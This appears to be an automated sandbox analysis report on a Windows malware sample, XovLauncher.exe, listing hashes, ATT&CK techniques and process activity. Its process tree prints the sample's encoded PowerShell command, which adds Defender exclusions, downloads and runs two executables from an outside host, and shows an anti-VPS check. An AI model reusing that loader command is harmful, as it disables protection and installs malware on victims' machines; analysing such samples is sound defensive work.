8d5bbc1df6891d4e6d87702068fedfdccf2533e0fe6648aa12e62766cc20cb54

General

Target

XovLauncher.exe
Size

9KB
MD5

abd3e1d69b885d3f98afd426b2157a8f
SHA1

e6543de93758224c0b5c7ab70e3dd0b0725a8484
SHA256

8d5bbc1df6891d4e6d87702068fedfdccf2533e0fe6648aa12e62766cc20cb54
SHA512

ac2a1863cc7b7633d120ee973b27a312e8047e5bb653a3b97207dbbe74d4ee3e4f9291e0a392b46f176cde748c1ac2f8d94936ca0fb19e133afbd269b6c6fd64
SSDEEP

192:5xyMD99zXjmYqLDv9lqvk+9xwcvkcFNtUqkAuY7vkadYdR:5xvD99jGLDv90k+9xTk6Nt/zuYDkeoR

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	2040	powershell.exe
5	2040	powershell.exe
6	2040	powershell.exe
7	2040	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2040	powershell.exe
2040	powershell.exe
1972	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1536 wrote to memory of 2040	1536	XovLauncher.exe	27
PID 1536 wrote to memory of 2040	1536	XovLauncher.exe	27
PID 1536 wrote to memory of 2040	1536	XovLauncher.exe	27
PID 2040 wrote to memory of 1972	2040	powershell.exe	30
PID 2040 wrote to memory of 1972	2040	powershell.exe	30
PID 2040 wrote to memory of 1972	2040	powershell.exe	30

C:\Users\Admin\AppData\Local\Temp\XovLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\XovLauncher.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGkAZwBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAYgBuACMAPgA7ACIAOwA8ACMAdwBjAHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB4AGwAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBnAHQAegAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AGMAegAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAYQBuAG8ANgAxADEAMQAvAGYAcwBkAGkAbwBmAG0AaQBzAGQAbgBmAGkAcwBkAG4AZgAvAHIAYQB3AC8AYQA3ADQAYgBjADAANwBkADgAYwAzAGMAMwAxADcANABhADYAOQBkAGYAYwBiADAANwAzADAAMgA5ADgANgAyADIAYQBlADgAYwA1ADcANwAvAG0AMQBtAC4AZQB4AGUAJwAsACAAPAAjAHMAeABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdAB3AGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegBtAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAKQA8ACMAZgB3AGYAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAYQBuAG8ANgAxADEAMQAvAGYAcwBkAGkAbwBmAG0AaQBzAGQAbgBmAGkAcwBkAG4AZgAvAHIAYQB3AC8AYQA3ADQAYgBjADAANwBkADgAYwAzAGMAMwAxADcANABhADYAOQBkAGYAYwBiADAANwAzADAAMgA5ADgANgAyADIAYQBlADgAYwA1ADcANwAvAGwAaQBtAC4AZQB4AGUAJwAsACAAPAAjAGYAbQBiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYQB4AHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeABtAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAQwBoAGUAYwBrAGUALgBlAHgAZQAnACkAKQA8ACMAeABzAHMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABxAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGYAcQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEcAZQB0AC4AZQB4AGUAJwApADwAIwBtAHUAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBnAHEAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegBtAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAQwBoAGUAYwBrAGUALgBlAHgAZQAnACkAPAAjAGgAdQBwACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#igg#>[System.Windows.Forms.MessageBox]::Show('No VPS allowed!','','OK','Error')<#tbn#>;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f3634a54ae6f06684d3a96518e322a83

SHA1
8d60383fe23fceb0af14b55c635064c8aa00ac2c

SHA256
48b363d2ab1d20beeead26e378f820dff78229e878b691dbe0f8ace7e686488c

SHA512
066f2f598af3a74272cfb569f55649a135dc34f1f09afc810fecdaffe949d1d45ce42f099c488b2ddf0a5ea00dc61f6142b2ac5fe9ff522a09f1d13b7c3ceed9

Download Submit
memory/1536-55-0x000007FEFC521000-0x000007FEFC523000-memory.dmp

Filesize
8KB

Download
memory/1536-54-0x0000000001090000-0x0000000001098000-memory.dmp

Filesize
32KB

Download
memory/1972-68-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1972-71-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/1972-72-0x00000000027EB000-0x000000000280A000-memory.dmp

Filesize
124KB

Download
memory/1972-60-0x0000000000000000-mapping.dmp

Download
memory/1972-63-0x000007FEEE0B0000-0x000007FEEEAD3000-memory.dmp

Filesize
10.1MB

Download
memory/1972-70-0x00000000027EB000-0x000000000280A000-memory.dmp

Filesize
124KB

Download
memory/1972-69-0x000007FEF3280000-0x000007FEF4316000-memory.dmp

Filesize
16.6MB

Download
memory/1972-67-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/1972-64-0x000007FEF57E0000-0x000007FEF633D000-memory.dmp

Filesize
11.4MB

Download
memory/2040-59-0x000007FEF57E0000-0x000007FEF633D000-memory.dmp

Filesize
11.4MB

Download
memory/2040-66-0x000000000254B000-0x000000000256A000-memory.dmp

Filesize
124KB

Download
memory/2040-65-0x0000000002544000-0x0000000002547000-memory.dmp

Filesize
12KB

Download
memory/2040-58-0x000007FEEE0B0000-0x000007FEEEAD3000-memory.dmp

Filesize
10.1MB

Download
memory/2040-56-0x0000000000000000-mapping.dmp

Download
memory/2040-73-0x000000000254B000-0x000000000256A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing